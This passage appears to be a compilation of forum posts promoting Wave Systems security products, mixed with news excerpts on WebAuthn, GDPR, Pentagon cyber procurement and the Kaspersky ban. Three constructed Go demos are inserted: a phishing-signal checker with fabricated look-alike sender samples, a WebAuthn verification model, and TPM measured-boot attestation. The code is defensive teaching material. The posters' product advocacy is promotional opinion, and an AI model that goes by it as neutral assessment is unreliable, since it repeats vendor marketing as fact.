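	"microsoft": {"microsoft.com", "outlook.com"},
}

// message is the slice of an inbound mail the checks need: sender header and one body hyperlink.
type message struct {
	FromName, FromAddr string
	LinkText, LinkHref string
}

func domainOf(addr string) string {
	if i := strings.LastIndex(addr, "@"); i >= 0 {
		return strings.ToLower(addr[i+1:])
	}
	return ""
}

// hostOf returns the lower-cased host of a URL, or "" when the text is not a URL at all.
func hostOf(raw string) string {
	u, err := url.Parse(strings.TrimSpace(raw))
	if err != nil {
		return ""
	}
	return strings.ToLower(u.Hostname())
}

func sameOrSubdomain(host, d string) bool { return host == d || strings.HasSuffix(host, "."+d) }

// lookalike catches the common character swaps used to imitate a brand domain (paypa1, rnicrosoft).
func lookalike(host, legit string) bool {
	r := strings.NewReplacer("0", "o", "1", "l", "3", "e", "5", "s", "rn", "m", "vv", "w")
	return host != legit && r.Replace(host) == legit
}

// phishingSignals returns the checks a message failed; an empty slice means nothing was found.
func phishingSignals(m message) []string {
	var out []string
	fromDom := domainOf(m.FromAddr)
	// 1. The display name invokes a brand the sending domain is not allowed to speak for.
	for brand, doms := range brandDomains {
		if !strings.Contains(strings.ToLower(m.FromName), brand) {
			continue
		}
		allowed := false
		for _, d := range doms {
			allowed = allowed || sameOrSubdomain(fromDom, d)
			if lookalike(fromDom, d) {
				out = append(out, "sender domain imitates "+d)
			}
		}
		if !allowed {
			out = append(out, "display name claims "+brand+" but sender is "+fromDom)
		}
	}
	// 2. The visible link text names one host while the real href goes somewhere else.
	if th, hh := hostOf(m.LinkText), hostOf(m.LinkHref); th != "" && hh != "" && !sameOrSubdomain(hh, th) {
		out = append(out, "link text shows "+th+" but points to "+hh)
	}
	sort.Strings(out) // map iteration order is random; keep the report stable
	return out
}

// sampleMessages are constructed for this demo; none of the addresses or links is real mail.
var sampleMessages = []message{
	{"PayPal", "service@paypal.com", "https://www.paypal.com/activity", "https://www.paypal.com/activity"},
	{"PayPal Security", "alerts@paypa1.com", "https://www.paypal.com/secure", "https://paypa1.com/login"},
	{"Microsoft 365", "admin@contoso-invoices.example", "Review document", "https://contoso-invoices.example/doc"},
}

// scanAll runs the checks over the samples and keys the findings by sender address.
func scanAll() map[string][]string {
	report := map[string][]string{}
	for _, m := range sampleMessages {
		report[m.FromAddr] = phishingSignals(m)
	}
	return report
}

func main() {
	for from, signals := range scanAll() {
		fmt.Printf("%-32s %d signal(s) %v\n", from, len(signals), signals)
	}
}
```

The genuine PayPal message produces no signals, the look-alike one trips all three checks, and the "Microsoft 365" message from an unrelated domain trips only the brand check, since its link text is not a URL. None of these checks needs sender authentication records; they are the cheap first pass that a gateway runs before the more expensive analysis the article's vendor sells.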
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Microsoft, Google, Facebook, Twitter Announce "Data Transfer Project"
The profiles mentioned in the article could be stored in the TPM and may be somewhat similar to the OneName/Wave agreement way back in 2000 except TPMs are ubiquitous now. It seems that the 'Trust at the Edge' of the network paradigm could work more effectively in this situation now that TPMs are ubiquitous!
https://www.bleepingcomputer.com/news/technology/microsoft-google-facebook-twitter-announce-data-transfer-project/
Facebook, Google, Microsoft, and Twitter have announced on Friday, July 20, the Data Transfer Project (DTP), an initiative to create an open-source, service-to-service data portability platform so that users of their sites and others can easily migrate data from one platform to another.
After open-sourcing the code, the four tech giants hope that other platforms will adopt their new technology and help create an interconnected web where users can easily move data from platform to platform without headaches and avoid situations where they have to set up profiles over and over and over and over again at each site they register.
But the DTP framework is also useful for other things. For example, the four companies say, it could be leveraged to build tools and software to extract and back up data stored in social media profiles, or for creating tools that wipe out a user's social presence.
DTP leverages existing APIs
According to a scientific paper the four companies working on DTP released yesterday, the DTP framework will work on existing APIs and authorization mechanisms to access data and convert it into a common format, and will require minimal modifications from participants.
Security features are baked in, and a governance body will also be created to oversee the framework's future development.
The DTP framework's source code is available on GitHub.
DTP already supports a few export types, online platforms
"Our prototype already supports data transfer for several product verticals including: photos, mail, contacts, calendar, and tasks. These are enabled by existing, publicly available APIs from Google, Microsoft, Twitter, Flickr, Instagram, Remember the Milk, and Smugmug," said Brian Willard, Software Engineer and Greg Fair, Product Manager at Google.
"For people on slow or low bandwidth connections, service-to-service portability will be especially important where infrastructure constraints and expense make importing and exporting data to or from the user’s system impractical if not nearly impossible," said Craig Shank, Vice President for Corporate Standards at Microsoft.
"These are the kinds of issues the Data Transfer Project will tackle. The Project is in its early stages, and we hope more organizations and experts will get involved," said Steve Satterfield, Privacy & Public Policy Director at Facebook.
"This will take time but we are very excited to work with innovators and passionate people from other companies to ensure we are putting you first," said Damien Kieran, Data Protection Officer at Twitter.
How Web Authentication May Change the Future of Passwords
Shouldn't Web Authentication or similar products have the premier TPM management company (Wave) and its product ESC/ETS used to help manage the TPM?
https://www.programmableweb.com/news/how-web-authentication-may-change-future-passwords/how-to/2018/07/19
Using WebAuthn (Web Authentication), clients can be verified with their phones, hardware keys, or trusted devices. In his article, Nick Steele explains the new standards in web authentication, followed by registration and authentication, where you’ll find PIN and biometric access methods; he then comments on how web browsers use a credential manager API.
Web Authentication
Trusted platform module devices that secure hardware through crypto keys and mobile phones are two of the many ways to authenticate via the web. Users can be authorized by fingerprints with biometric verification, although additional biometric methods exist, like retina and iris patterns, hand geometry, earlobe geometry, voice waves, and DNA. When a customer is authenticated via the web, passwords will no longer be necessary.
Registration
When a user registers, the created credential confirms to the web app owner that access is granted. This method replaces ordinary U2F cases, in which one security key instantly validates user presence. U2F is used by Facebook, Gmail, Dropbox, Salesforce.com, and GitHub. Think about the times when you’ve confirmed identity to Gmail by entering a number they send you via text message on your phone.
The author clarifies registration with an example: A user visits the website cat-facts.com from a laptop, registering for an account. By pressing the registration button, a prompt on their phone says “Register with cat-facts.com.” When they accept the request, the user could use a PIN or a biometric action (like a fingerprint) that will be linked to the created account. This action will display a confirmation: “Registration complete!” This user is now registered and the system has recorded the authorization gesture for future access.
The same image the author shares makes me think of my phone when I download an app from the App Store.
Authentication
The credential created by the user is a keypair, a public key associated to a private key. The device the user is trying to authenticate will send verification data to prove user identity. When the user confirms presence, the data will be returned signed by the credential private key, authenticating the user to the device.
To demonstrate WebAuthn, let’s imagine a user registered a second account at the site example.com and the person is browsing on a phone. As the user types the address example.com, the option to log in is chosen and two accounts will be displayed. The user will select the account and then be prompted to enter a PIN or a biometric authentication linked to the account.
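The two sections above describe registration (a keypair is created, the site keeps the public key) and authentication (the site sends verification data, the device returns it signed with the private key). The Go program below is an added example that models both halves in one process with the standard library; it is not the browser's WebAuthn API and not the author's webauthn.io demo. The relying-party id `example.com`, the origin `https://example.com`, the type names and the look-alike origin are assumptions made for the demo, and the client-data JSON uses the demo's own field names rather than the exact WebAuthn ones. Beyond the article's happy path it also shows why the server must issue a fresh challenge per login and compare the page origin: a replayed response and a response minted on a look-alike site are both rejected, which is the property that makes the credential resistant to phishing.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// Assumed values for this constructed demo.
const rpID = "example.com"                  // relying-party id the credential is scoped to
const allowedOrigin = "https://example.com" // the only page origin the server accepts

// clientData is what the browser hands the authenticator; the signature binds all three fields.
type clientData struct{ Type, Challenge, Origin string }

// authenticator stands in for the phone or security key: private keys never leave it.
type authenticator struct{ keys map[string]*ecdsa.PrivateKey }

// register mints a per-site P-256 (ES256) keypair; only the public half goes to the server.
func (a *authenticator) register() (credID string, pub *ecdsa.PublicKey) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	id := make([]byte, 16)
	rand.Read(id)
	a.keys[hex.EncodeToString(id)] = priv
	return hex.EncodeToString(id), &priv.PublicKey
}

// signedMessage is what WebAuthn signs: SHA-256 over authData || SHA-256(clientDataJSON).
func signedMessage(authData, clientJSON []byte) []byte {
	cdHash := sha256.Sum256(clientJSON)
	d := sha256.Sum256(append(append([]byte{}, authData...), cdHash[:]...))
	return d[:]
}

// assert answers one challenge after the presence gesture (PIN or fingerprint, assumed given);
// it returns authData (rpIdHash || flags) and the signature over authData and clientJSON.
func (a *authenticator) assert(credID string, clientJSON []byte) (authData, sig []byte) {
	rpHash := sha256.Sum256([]byte(rpID))
	authData = append(rpHash[:], 0x01) // flags byte: user present
	sig, err := ecdsa.SignASN1(rand.Reader, a.keys[credID], signedMessage(authData, clientJSON))
	if err != nil {
		panic(err)
	}
	return authData, sig
}

// relyingParty is the server: it holds public keys only and issues single-use challenges.
type relyingParty struct {
	pubKeys    map[string]*ecdsa.PublicKey
	challenges map[string]bool
}

func (rp *relyingParty) newChallenge() string {
	b := make([]byte, 32)
	rand.Read(b)
	rp.challenges[hex.EncodeToString(b)] = true
	return hex.EncodeToString(b)
}

// verify returns nil for a valid assertion, or an error naming the check that failed.
func (rp *relyingParty) verify(credID string, authData, clientJSON, sig []byte) error {
	pub, cd := rp.pubKeys[credID], clientData{}
	if pub == nil || json.Unmarshal(clientJSON, &cd) != nil || cd.Type != "webauthn.get" {
		return errors.New("unknown credential or malformed client data")
	}
	if !rp.challenges[cd.Challenge] {
		return errors.New("challenge unknown or already used")
	}
	delete(rp.challenges, cd.Challenge) // a signed response is good exactly once
	if cd.Origin != allowedOrigin {
		return errors.New("origin mismatch")
	}
	rpHash := sha256.Sum256([]byte(rpID))
	if len(authData) != 33 || string(authData[:32]) != string(rpHash[:]) || authData[32]&1 == 0 {
		return errors.New("wrong relying party or user presence not asserted")
	}
	if !ecdsa.VerifyASN1(pub, signedMessage(authData, clientJSON), sig) {
		return errors.New("bad signature")
	}
	return nil
}

// runScenario: a good login, a replay of the same response, and a login minted on a look-alike origin.
func runScenario() (loginErr, replayErr, originErr error) {
	auth := &authenticator{keys: map[string]*ecdsa.PrivateKey{}}
	rp := &relyingParty{map[string]*ecdsa.PublicKey{}, map[string]bool{}}
	credID, pub := auth.register()
	rp.pubKeys[credID] = pub // registration: the server stores the public key, nothing secret
	cj, _ := json.Marshal(clientData{"webauthn.get", rp.newChallenge(), allowedOrigin})
	ad, sig := auth.assert(credID, cj)
	loginErr = rp.verify(credID, ad, cj, sig)
	replayErr = rp.verify(credID, ad, cj, sig) // same response again: challenge already consumed
	cj2, _ := json.Marshal(clientData{"webauthn.get", rp.newChallenge(), "https://examp1e.com"})
	ad2, sig2 := auth.assert(credID, cj2)
	originErr = rp.verify(credID, ad2, cj2, sig2) // valid signature, but page origin is not ours
	return
}

func main() { fmt.Println(runScenario()) }
```

The server never holds anything a breach could turn into a working login: a stolen public key and a consumed challenge are useless, and a response captured on a look-alike site carries that site's origin inside the signed data, so it fails verification at the real one.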
Credential manager API and… the end of passwords?
WebAuthn aims to provide unique biometric multi-factor authentication, like a fingerprint from a smartphone, voice, or retina. Eye verification would be from a short-range distance, although an iris scanner that captures an eye from 40 feet away has already been developed by the Carnegie Mellon University College of Engineering. The idea is to authenticate with particular traits to increase security and replace passwords.
WebAuthn currently only supports two-factor authentication that in most cases includes a username and password in addition to authentication via smartphone. If biometric verification is not available, entering a PIN can work because it will still be browser-protected by Google, Microsoft, and Firefox. Verification stored by browsers could be handled by a Credential Manager API that Google uses in Chrome. As W3 defines it, the API enables a website to request a user’s credentials from a user agent, helping the user agent correctly store user credentials for future use.
The end of passwords is not near yet. The author predicts Firefox and Google could release the WebAuthn API within the next months.
He has developed a web app in Go hosted on GitHub to demonstrate how WebAuthn registration and authentication work. You can try out the code via webauthn.io in a Firefox Nightly build.
https://www.wavesys.com/products/embassy-security-center
This puts the endpoint in endpoint security
A key piece of the Wave alternative, Wave’s EMBASSY® Security Center is what lets you manage all the functions of your Trusted Platform Modules (TPMs) and self-encrypting drives (SEDs)—hardware security features already embedded in most business-class PCs and tablets. When installed on each of your desktops, laptops, tablets, and so on, this feature-rich software carries out the commands you issue remotely with our EMBASSY server products.
Key Features:
Easy security compliance
• When your endpoints are secure and reporting is in place, you’ve got compliance covered
Data protection
• Configure your VPN so that only authorized machines can access it from the outside
• Multi-factor authentication options include any combination of individual passwords, a master password, biometrics, smart cards, or a TPM PKI certificate
• Easy backup and recovery of TPM keys in case of malfunction of the TPM, motherboard, or hard drive
• Enables hardware-based pre-boot authentication to the encrypted hard drive (if equipped)
Simplicity
• Central management of security policies at the machine and user levels via our EMBASSY Remote Administration Server
• Deploy TPMs from multiple manufacturers using a single management system
• Deploy SEDs in minutes that integrate seamlessly with single sign-on (SSO) to Windows and Windows password synchronization
No compromises
• More security without more passwords to remember
• Your devices will perform just the same—our software makes them safer, not slower
Windows 8 Compatibility
• Compatible with Windows 8.1, 8, 7 and Vista operating systems – manage mixed environments from one console
• ESC supports Windows 8 Pro & Enterprise tablets so the same tools can secure all your enterprise endpoints
Application development
• Accelerate your application development, determine compatibility of your application and the TPM by using Wave’s Cryptographic Service Provider or Key Storage Provider, both included with the Embassy Security Center
Only 20% of companies have fully completed their GDPR implementations
https://www.helpnetsecurity.com/2018/07/16/complete-gdpr-implementation/?utm_source=twitter&utm_medium=social&utm_campaign=corpcomms&utm_content=industry-news
Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation.
EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end of 2018 and 93% by the end of 2019.
While many companies still have a long way to go, a comparison to August 2017 research shows significant progress in the past ten months. The number of companies whose GDPR implementation is under way or completed increased from 38% to 66% in the U.S. and from 37% to 73% in the UK.
The cost of compliance is high
• 27% of companies spent over half a million dollars each to become GDPR compliant
• 31% of companies plan to spend over half a million dollars each on GDPR compliance efforts between June and December 2018
• 18% of US companies spent over 1 million dollars each on compliance versus 8% for UK and 8% for EU companies.
Most companies are positive about GDPR
Despite difficulties in becoming GDPR compliant, 65% view GDPR as having a positive impact on their business. Only 15% view the GDPR as having a negative impact on their business
Customer expectations and complexity top GDPR drivers
• Meeting customer expectations (57%) was the main driver to become compliant, significantly higher than concern for fines (39%)
• Complexity of GDPR posed the biggest challenge to comply.
GDPR will continue to drive privacy investments
• 87% indicate that data privacy will become more important at their companies post the GDPR deadline
• 80% of companies plan to increase their spending on GDPR technology and tools to maintain compliance.
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
Easy proof of compliance
Your encryption is only as good as you can prove it to be. To comply with most data protection regulations, your organization has to prove encryption was in place at the time of a potential breach. Wave provides secure audit logs to help you demonstrate compliance.
If you lose a device with a Wave-managed SED, there’s no wondering or guessing. You know encryption was on by default, and you can prove it.
No vendor lock-in
SED technology was created and standardized by a consortium of the best in the infosec industry, a standards body called the Trusted Computing Group (TCG). This means you can buy your drives wherever you want, from whatever vendor you want—any SED built to the TCG’s Opal specification can be managed by Wave.
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
Pick your platform
Wave SED management is available via the cloud or on-premise servers. Ask us for more details about which platform is right for your deployment.
https://www.wavesys.com/products/wave-virtual-smart-card
Wave could have a big impact in getting companies GDPR compliant. imo.
If Your Weapons Aren’t Cyber-Hardened, Expect to Lose Pentagon Contracts
https://www.defenseone.com/business/2018/07/if-your-weapons-arent-cyber-hardened-expect-lose-pentagon-contracts/149783/
The Pentagon intends to start assessing its weapons’ resistance to hacks, instead of leaving that to manufacturers.
FARNBOROUGH, UK — The Pentagon could stop awarding contracts to companies whose weapons are deemed vulnerable to cyber attacks, according to senior U.S. Defense Department officials.
Today, companies are responsible for assessing whether their own products meet DoD cybersecurity standards.
“Because of a couple recent events, we realized that that is not good enough,” Kevin Fahey, the assistant secretary of defense for acquisition, said Monday during a briefing at the Farnborough Air Show.
In February, Deputy Defense Secretary Patrick Shanahan issued a stern warning to companies: protect your networks or risk losing business. In June, Chinese hackers allegedly stole sensitive submarine warfare information from a contractor’s computer.
Officials from the Pentagon’s acquisition, intelligence, chief information officer and research-and-engineering offices are creating a way to test the cyber defenses of weapons when assessing bids from companies. The effort is called “Delivered Uncompromised.”
“If you think about our weapon systems today, the IT infrastructure is a part of our weapon system,” Fahey said.
MITRE Corp., a research-and-development firm, conducted a study, which is “the baseline of where we’re starting from,” Fahey said after the briefing.
The MITRE report noted supply chain vulnerabilities, according to a person familiar with its findings, and made a series of recommendations, including making cyber hardening a “fourth pillar” of acquisition, along with cost, schedule and past performance.
The Pentagon has taken a number of steps in recent months to tighten its cyber defenses. In February, the Defense Science Board made a series of recommendations to improve the way the Pentagon buys software. Two months later, Ellen Lord, the undersecretary for acquisition and sustainment, tapped Jeff Boleng — a former Air Force cybersecurity operations officer — as her special assistant for software acquisition. The Pentagon is also assessing the cyber vulnerabilities of its weapons and infrastructure. The efforts are all intertwined, according to a source with insight into the projects.
“We have to develop a way that we evaluate people’s capability in cyber security almost as a go, no-go versus it’s a comparison between cost, schedule and performance and cyber,” Fahey said after the roundtable. “Cost, schedule, performance always end up being one, two and three [in terms of priority] and then if you’re the fourth, you’re not that important.”
Officials are considering using a grading system for cyber standards that is similar to the way the department assesses the maturity of software. They are also considering creating “red teams” that would test contractors’ cyber defenses. Another consideration is offering contractors government-certified cyber tools.
“We know it’s really serious now that we need to make that as a priority and then figure out how do we help the small businesses,” Fahey said. “One of the ideas is almost us maybe being able to deliver them the IT infrastructure as [government furnished equipment] that is cyber secure. That is a high priority across the department.”
Today companies have to declare that they comply with federal acquisition regulations, “but we really don’t check it,” Fahey said. If a company does not meet the standards, it’s not a condition that could prevent them from being awarded a contract. “You just have to come up with a plan on how you’re going to meet it,” he said.
Officials believe that requiring cyber hardening as part of a weapon competition will force companies to better protect their systems.
“If it becomes a competitive differentiator, then what ends up happening is you’ve got every incentive in the world to meet that standard and to use it because it’s something that you need to be successful,” Eric Chewning, deputy assistant secretary of defense for manufacturing and industrial base policy, said in an interview.
Said Fahey: “The only way you make it serious to industry is you make it part of the competition.”
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Less Than Half of Cyberattacks Detected via Antivirus: SANS
See previous post for relevant information on Wave Endpoint Monitor. With so many companies still using traditional antivirus it would seem that a product like WEM could be just what these companies need.
https://www.darkreading.com/endpoint/less-than-half-of-cyberattacks-detected-via-antivirus-sans/d/d-id/1332309?_mc=KJH-Twitter-2018-07
Companies are buying next-gen antivirus and fileless attack detection tools but few have the resources to use them, researchers report.
Businesses are investing in more advanced endpoint security tools but don't have the means to properly implement and use them, according to a new report from the SANS Institute.
The SANS 2018 Survey on Endpoint Protection and Response polled 277 IT professionals on endpoint security concerns and practices. In this year's survey, 42% of respondents reported endpoint exploits, down from 53% in 2017. However, the number of those who didn't know they had been breached jumped from 10% in 2017 to 20% in 2018.
Traditional tools are no longer sufficient to detect cyberattacks, the data shows: Antivirus systems only detected endpoint compromise 47% of the time; other attacks were caught through automated SIEM alerts (32%) and endpoint detection and response platforms (26%).
Most endpoint attacks are intended to exploit users. More than 50% of respondents reported Web drive-by incidents, 53% pointed to social engineering and phishing attacks, and half cited ransomware. Credential theft was used in 40% of compromises reported, researchers state.
The majority (84%) of endpoint breaches involve more than one device, experts report. Desktops and laptops are still the top devices of concern, but attackers are also compromising server endpoints, cloud-based endpoints, SCADA, and other industrial IoT devices. Cloud-based endpoints are increasingly popular, going from just over 40% in 2017 to 60% in 2018.
Given the commonality and effectiveness of user-targeted attacks, it's worth noting that detection technologies designed to look at user and system behavior, or provide context awareness, were less involved in detecting breaches. Only 23% of breaches were found with attack behavior-modeling and only 11% were detected with behavior analytics.
Businesses aren't using these technologies as often because they lack the means, SANS reports. Many IT and security pros report investing in next-gen capabilities but not installing them. For example, half have acquired next-gen AV tools but 37% have not implemented them. Forty-nine percent have fileless attack detection tools but 38% haven't implemented the tech.
When breaches do occur it seems many businesses can trace them to the source. Nearly 80% of respondents report they can tie a user to endpoints and servers at least half the time (34% always, 45% at least half), which adds an identity when making decisions about user behavior.
Data collection makes a major difference in data breach remediation, but organizations don't always have access to the data they needed. Most (84%) respondents want more network access and user data, 74% want more network security data from firewall/IPS/unified threat management systems, and 69% want better network traffic analysis.
Government’s Kaspersky Ban Takes Effect
The government should look to have a better malware defense by incorporating Wave Endpoint Monitor. imo. Having Kaspersky banned should put more emphasis on using better anti-malware products like WEM. If only the right people really knew about WEM and other Wave products.
https://www.nextgov.com/cybersecurity/2018/07/governments-kaspersky-ban-takes-effect/149758/
Pentagon, GSA and NASA contracts will now officially prohibit Kaspersky software.
A new procurement rule took effect Monday barring the Russian anti-virus company Kaspersky Lab or any of its partners or distributors from contracts at the Pentagon, General Services Administration or NASA, despite a last-minute Kaspersky effort to halt the ban.
Kaspersky told a federal appeals court last week that the ban would cause the company “reputational and financial damage” and asked the court to temporarily halt the ban while it considers Kaspersky’s underlying legal challenge.
The U.S. Court of Appeals for the D.C. Circuit denied that request late Friday. The one-sentence ruling stated Kaspersky had “not satisfied the stringent requirements for an injunction pending appeal.”
The December 2017 congressional ban was sparked by intelligence agencies’ allegation that Kaspersky executives are too closely tied to the Kremlin and the Homeland Security Department’s conclusion that a Russian cybersecurity law might compel Kaspersky to help Russian intelligence agencies spy on the U.S. government.
Kaspersky has consistently denied any undue influence by the Kremlin and said the Homeland Security Department is misreading the Russian law.
Kaspersky told Nextgov in a statement that the company “is disappointed that the appellate court did not grant the company’s motion to stay … but remains hopeful that the court will find the law unconstitutional after full consideration of the case on the merits.”
Kaspersky’s broad legal argument against the U.S. ban is that Congress unfairly singled it out for punishment without sufficient legal process—what’s called a “bill of attainder.” A U.S. district court judge dismissed that claim in May, saying Congress’s goal was to protect national security, not to punish Kaspersky.
That’s the ruling Kaspersky is appealing.
Kaspersky software has already been scrubbed from all civilian government systems because of a separate ban imposed by Homeland Security in October. Government lawyers argued that meant it was pointless to stall the congressional ban because it would have no practical effect.
Kaspersky disputed that claim in its unsuccessful argument to the appeal court. Putting the congressional ban into effect will damage Kaspersky’s reputation—and its U.S. private-sector sales—even if the ban itself doesn’t lose the company any business, the motion said.
Kaspersky and the government are scheduled to make oral arguments in the case in September.
Congress is likely to enact similar governmentwide contracting bans targeting the Chinese companies Huawei and ZTE in the 2019 version of an annual defense policy bill that’s currently being squared away by a House-Senate conference committee.
The White House has proposed legislation that would make such bans easier in both civilian and defense agencies.
https://www.wavesys.com/malware-protection
Excerpts:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient zero who discovers he is infected for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strain of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine-tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack.
The extent of APTs seems wider each week. News stories about targeted attacks on organizations appear weekly. Even more stories do not appear, as some malware is not detected for very long periods of time. Some malware described as "cutting edge" has code components that have been available for 3 and 4 years, thus dating its undetected time of life in the wild. With online tools, even a non-technical person can create malware easily. And there are more ways than ever for malware to spread: the Internet, personal computing devices, downloads, email, social media sites. Government agencies recognize it as a growing threat. Early detection is the highest priority in this cyberwar. In 2011 NIST published guidelines for establishing a chain of trust for the basic input/output system (BIOS), which initializes a computer when it boots up. This critical system is one of malware’s more consequential targets and an area specifically protected by Wave Systems in its products and in its thinking.
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
Which other attack vector should you watch? One common vector that is used to attack even the most secure networks is physical devices – connected to USB, FireWire or SD. Our Data Protection Suite AV scanner allows you to block any unscreened device from connecting to any machine in the organization, until it has been scanned for known malware.
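The excerpt above makes three claims worth seeing in code: malware below the OS can feed anti-malware software false results, a BIOS chain of trust is the answer NIST proposed, and a managed TPM lets you know immediately whether a device has been tampered with. The Go program below is an added, constructed illustration of the measured-boot mechanism behind those claims; it is not Wave's product code and not NIST's reference implementation. Each boot stage hashes the next one into a register that can only be extended (the TPM PCR rule, PCR' = SHA-256(PCR || SHA-256(component))), and a remote verifier replays the event log against golden digests recorded from a known-good device. The firmware images, stage names and golden values are all constructed stand-ins.

```go
// Constructed measured-boot demo; not Wave's product code and not NIST's reference implementation.
package main

import (
	"bytes"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// bootEvent is one entry of the measurement log: which stage was measured and its SHA-256.
type bootEvent struct{ Name, Digest string }

// extend is the TPM PCR rule: PCR' = SHA-256(PCR || SHA-256(component)). A register that can
// only be extended, never written, is what lets a verifier trust the chain below the OS.
func extend(pcr, component []byte) ([]byte, string) {
	d := sha256.Sum256(component)
	n := sha256.Sum256(append(append([]byte{}, pcr...), d[:]...))
	return n[:], hex.EncodeToString(d[:])
}

// measureBoot simulates each stage measuring the next one before handing over control.
func measureBoot(chain [][2]string) (pcr []byte, log []bootEvent) {
	pcr = make([]byte, 32)
	for _, c := range chain {
		var digest string
		pcr, digest = extend(pcr, []byte(c[1]))
		log = append(log, bootEvent{c[0], digest})
	}
	return pcr, log
}

// verifyAttestation is the remote verifier: every logged digest must equal the golden value
// for that stage, and replaying the log must reproduce the PCR the TPM itself reported.
func verifyAttestation(reportedPCR []byte, log []bootEvent, golden map[string]string) (bool, string) {
	pcr := make([]byte, 32)
	for _, ev := range log {
		if golden[ev.Name] != ev.Digest {
			return false, "unexpected measurement for " + ev.Name
		}
		raw, _ := hex.DecodeString(ev.Digest)
		n := sha256.Sum256(append(append([]byte{}, pcr...), raw...))
		pcr = n[:]
	}
	if !bytes.Equal(pcr, reportedPCR) {
		return false, "event log does not reproduce reported PCR"
	}
	return true, "boot chain matches golden values"
}

// Constructed stand-ins for firmware images; in practice these are the actual binaries.
var (
	goodChain = [][2]string{
		{"bios", "constructed: vendor BIOS v1.2"},
		{"bootloader", "constructed: signed bootloader"},
		{"kernel", "constructed: OS kernel build 42"},
	}
	tamperedChain = [][2]string{{"bios", "constructed: BIOS v1.2 with implanted code"}, goodChain[1], goodChain[2]}
)

// goldenValues are the digests recorded from a known-good device at enrollment time.
func goldenValues() map[string]string {
	_, log := measureBoot(goodChain)
	g := map[string]string{}
	for _, ev := range log {
		g[ev.Name] = ev.Digest
	}
	return g
}

// scenarioClean: an untouched device attests successfully.
func scenarioClean() (bool, string) {
	pcr, log := measureBoot(goodChain)
	return verifyAttestation(pcr, log, goldenValues())
}

// scenarioTamperedFirmware: an implant in the BIOS shows up as a wrong digest in the log.
func scenarioTamperedFirmware() (bool, string) {
	pcr, log := measureBoot(tamperedChain)
	return verifyAttestation(pcr, log, goldenValues())
}

// scenarioForgedLog: the implant rewrites the OS-visible log to look clean (the "false results"
// the text mentions) but cannot rewind the hardware register, so the replay no longer matches.
func scenarioForgedLog() (bool, string) {
	pcr, _ := measureBoot(tamperedChain)
	_, cleanLog := measureBoot(goodChain)
	return verifyAttestation(pcr, cleanLog, goldenValues())
}

func main() {
	for _, s := range []func() (bool, string){scenarioClean, scenarioTamperedFirmware, scenarioForgedLog} {
		fmt.Println(s())
	}
}
```

The third scenario is the one that matters for the excerpt's argument: software that lives below the OS can lie to the anti-malware agent about what it sees, but it cannot undo an extend that already happened in hardware, so a verifier holding the TPM's own register value catches the forged log. A real deployment would sign the reported PCR with a key held in the TPM (a quote) so the verifier can also trust that the value came from that chip.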
U.S. intelligence chief lays out threats to U.S. infrastructure, efforts to protect it.
